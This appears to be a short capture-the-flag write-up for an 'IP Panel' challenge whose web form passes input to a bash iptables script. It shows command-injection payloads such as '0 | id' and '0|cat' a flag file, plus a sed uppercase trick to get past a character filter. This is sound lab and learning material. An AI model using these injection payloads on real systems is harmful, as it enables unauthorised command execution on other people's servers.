17 – IP Panel

Exploit Mozillas IP Panel! This IP Panel is used for whitelisting IP addresses. We know that the webinterface will call a bash script that will execute an iptables command without validation. Find the flag somewhere in /home/ippanel/ and submit it!

IP Panel
Update:
The files are not actually in the home directory. Look somewhere else. Sorry!

gold: 250 +3 (1st), +2 (2nd), +1 (3rd)

as the description says that this call a bash script and execute iptables
so we try to add something else to the command

0 | id

and bingo we see something

Adding "0 | id"
uid=80(www) gid=80(www) groups=80(www)

so we can execute our commands easily , but the only problem is some filtres
for some chars like (p,[,],; etc..)
we tried to see what current dir contain

0 | ls

and we obtain

Adding "0 | ls"
CSS

its obvious that that it returns only the first line so we used sed to print the other lines one by one
p is filtred so we just turn it to uppercase to bypass filter

0||ls|sed -n 'nP'

some intresting file name showed up in 4th line

Adding "0||ls|sed -n '2P'"
index.php

Adding "0||ls|sed -n '3P'||"
parser.sh

Adding "0||ls|sed -n '4P'"
th15-15_th3_fl4g.txt

we try to open it through browser seems not enough permissions
so we just use that bash script again

Adding "0|cat th15-15_th3_fl4g.txt"
i1gALKeMunqCcyeVMud7TCbI

and finally some flag